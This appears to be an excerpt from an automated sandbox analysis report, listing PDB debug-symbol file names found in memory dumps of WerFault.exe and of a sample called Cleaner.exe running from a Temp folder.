                  Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdbb source: WerFault.exe, 00000020.00000003.620701035.000001E43112D000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb8 source: WerFault.exe, 00000020.00000003.620436247.000001E431116000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620402333.000001E431112000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dwmapi.pdbG source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: win32u.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: m.pdb*,0I source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: UxTheme.pdb6 source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnsapi.pdb] source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoree.pdb source: WerFault.exe, 00000020.00000003.605287062.000001E430C1F000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.603046751.000001E430C1E000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.602098493.000001E430647000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.600066159.000001E430647000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb0 source: WerFault.exe, 00000020.00000003.605731171.000001E430641000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shcore.pdbj source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: imm32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdb0 source: WerFault.exe, 00000020.00000003.603811328.000001E430654000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.602165213.000001E430654000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mswsock.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: m.pdbC source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: version.pdb: source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nsi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: advapi32.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: powrprof.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: imm32.pdbA source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: clrjit.pdb5 source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620919368.000001E431146000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ole32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.pdb source: Cleaner.exe, 00000018.00000000.584189785.0000014375B13000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.615655791.0000014375B1C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rasadhlp.pdbX source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: psapi.pdb` source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ole32.pdbL source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdbrpW0 source: Cleaner.exe, 00000018.00000000.579357284.0000014373834000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: comctl32.pdbG source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: DWrite.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Cleaner.PDBx source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.614858478.00000009D2EF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: combase.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.pdb source: WerFault.exe, 00000020.00000003.620894635.000001E431143000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Cleaner.exe, 00000018.00000000.578942897.00000143737A7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winnsi.pdbj source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.PDB source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.614858478.00000009D2EF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: winhttp.pdbe source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptsp.pdb] source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: profapi.pdbX source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dhcpcsvc6.pdbw source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.PDB08 source: Cleaner.exe, 00000018.00000000.572272911.00000009D2EF5000.00000004.00000010.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.614858478.00000009D2EF8000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: kernel32.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: apphelp.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shell32.pdb0 source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rasadhlp.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.PDB source: Cleaner.exe, 00000018.00000000.597173230.0000014377C1A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: kernelbase.pdb source: WerFault.exe, 00000020.00000003.603811328.000001E430654000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.602165213.000001E430654000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: iphlpapi.pdb5 source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Accessibility.ni.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb22k source: WerFault.exe, 00000020.00000003.620919368.000001E431146000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rpcrt4.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shlwapi.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: apphelp.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WerFault.exe, 00000020.00000003.621032216.000001E43112E000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620701035.000001E43112D000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: combase.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Drawing.ni.pdb source: WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620894635.000001E431143000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shcore.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: user32.pdbK source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: fltLib.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: powrprof.pdb? source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: shell32.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mswsock.pdbT source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: sechost.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rsaenh.pdbS source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: oleaut32.pdb9 source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winhttp.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdbTT source: WerFault.exe, 00000020.00000003.620919368.000001E431146000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: gdiplus.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: Cleaner.exe, 00000018.00000000.597089823.0000014377C10000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rtutils.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoreei.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: gdi32.pdb source: WerFault.exe, 00000020.00000003.621394438.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621252876.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620458409.000001E43111A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: profapi.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: clr.pdbB source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WindowsCodecs.pdb source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000020.00000003.620621756.000001E431144000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dhcpcsvc.pdb^ source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: Cleaner.exe, 00000018.00000000.579357284.0000014373834000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscoreei.pdb0 source: WerFault.exe, 00000020.00000003.601486906.000001E43067A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.600318897.000001E43067A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: sechost.pdb source: WerFault.exe, 00000020.00000003.620292704.000001E431117000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: clrjit.pdb source: WerFault.exe, 00000020.00000003.621274264.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620340840.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621417383.000001E43111C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620483277.000001E43111C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: DWrite.pdbS source: WerFault.exe, 00000020.00000003.620981328.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.621455993.000001E431127000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000020.00000003.620206636.000001E431120000.00000004.00000020.00020000.00000000.sdmp
